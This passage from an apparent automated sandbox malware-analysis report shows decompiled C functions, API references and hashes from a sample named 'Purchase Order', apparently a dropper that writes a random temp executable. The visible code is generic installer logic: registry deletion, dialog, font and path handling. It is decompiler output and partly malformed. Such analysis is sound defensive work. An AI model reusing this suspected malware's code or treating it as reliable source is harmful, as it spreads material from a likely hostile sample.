							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32 ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32 ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32 ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32 ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}

0x00404d4f
0x00404d54
0x00404d5c
0x00404d5d
0x00404d6a
0x00404d72
0x00404d73
0x00404d75
0x00404d77
0x00404d79
0x00404d7c
0x00404d7c
0x00404d83
0x00404d89
0x00404d89
0x00404d90
0x00404d97
0x00404d9a
0x00404d9d
0x00404d9d
0x00404da1
0x00404db1
0x00404db3
0x00404db6
0x00404d5f
0x00404d5f
0x00404d66
0x00404d66
0x00404dbe
0x00404dc9
0x00404ddf
0x00404df0
0x00404e0c

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32 ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405EB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EB7(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405E39(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405ec0
0x00405ec7
0x00405eca
0x00405ecc
0x00405ed2
0x00405eea
0x00405f0c
0x00000000
0x00405ef2
0x00405ef4
0x00405ef5
0x00405ef8
0x00405ef9
0x00405f02
0x00000000
0x00000000
0x00405f05
0x00405f08
0x00000000
0x00000000
0x00000000
0x00405f08
0x00000000
0x00405ef5
0x00405ee1
0x00000000
0x00405ee2

APIs

CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405C69,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405EC5
CharNextW.USER32(00000000), ref: 00405ECA
CharNextW.USER32(00000000), ref: 00405EE2

Strings

C:\, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405e0d
0x00405e1a
0x00405e1b
0x00405e26
0x00405e2e
0x00405e2e
0x00405e36

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040351A,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040351A,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x42aa20 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}

0x00403020
0x00403040
0x0040304a
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32 ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}

0x00405517
0x00405521
0x0040553d
0x0040555f
0x00405562
0x00405568
0x00405572
0x00405573
0x00405575
0x0040557b
0x0040557b
0x00405585
0x00000000
0x00405593
